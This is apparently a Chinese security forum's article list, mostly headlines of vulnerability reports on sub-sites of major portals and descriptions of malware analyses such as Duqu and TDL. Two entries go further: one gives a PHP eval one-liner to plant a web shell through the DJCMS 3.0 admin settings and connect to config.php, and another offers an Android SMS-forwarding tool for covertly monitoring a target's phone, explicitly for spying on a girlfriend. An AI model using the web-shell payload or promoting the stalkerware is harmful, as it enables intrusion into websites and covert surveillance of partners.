文章列表
中关村在线(zol.com.cn)某分站 SQL注入漏洞
中关村在线(zol.com.cn)某分站 SQL注入漏洞
新浪(sina.com.cn)某分站 SQL注入漏洞
新浪(sina.com.cn)某分站 SQL注入漏洞
搜狐(sohu.com)某分站 反射型XSS跨站漏洞+信息泄露漏洞
搜狐(sohu.com)某分站 反射型XSS跨站漏洞+信息泄露漏洞
DJCMS 3.0后台拿shell
进入后台 在其它设置里 网站名称插入以下一句话 记住提交两次");eval($_POST)?>然后用菜刀连接http://www.u.com/inc/config.php by:xch40
安卓系统下的手机短信监听工具【已更至新版本】
特殊需要写了个短信监听工具,分享出来。将文件安装到目标手机上,在目标手机的SD卡根目录建立destinationAddress.txt【文明名必须为:destinationAddress.txt】在这个文件里的首行写上你的手机号码,目标机接收到的所有新短信都会转发到你的手机上,监听出轨女朋友的的同学用的到的。PS:新版本的短信
Duqu病毒分析报告
著名的Duqu工业病毒,这是赛门铁克发布的一篇报告,虽不算最早,但也比较权威,值得学习!w32_duqu_the_precursor_to_the_next_stuxnet.swf
The Evolution of TDL
TDL是一款技术含量比较高的BootKit病毒,附件内是来自国外的一份分析报告,值得学习!The_Evolution_of_TDL.swf
Emet软件保护研究
什么是Emet: EMET(增强减灾体验工具)是Enhanced Mitigation Experience Toolkit的缩写。该软件是微软为应对互联网中层出不穷的漏洞而推出的一款安全工具。它通过数据执行保护(DEP)、结构化异常处理覆盖保护(SEHOP)和随机地址空间分配(ASLR)等技术使用户即使在未安装补丁的情况下也可以免
httpdx 1.5.4 Remote HTTP Server Denial of Service漏洞分析
httpdx_Remote_HTTP_Server_Denial_of_Service.swf
百度(baidu.com)分站 反射型XSS跨站漏洞
百度(baidu.com)分站 反射型XSS跨站漏洞
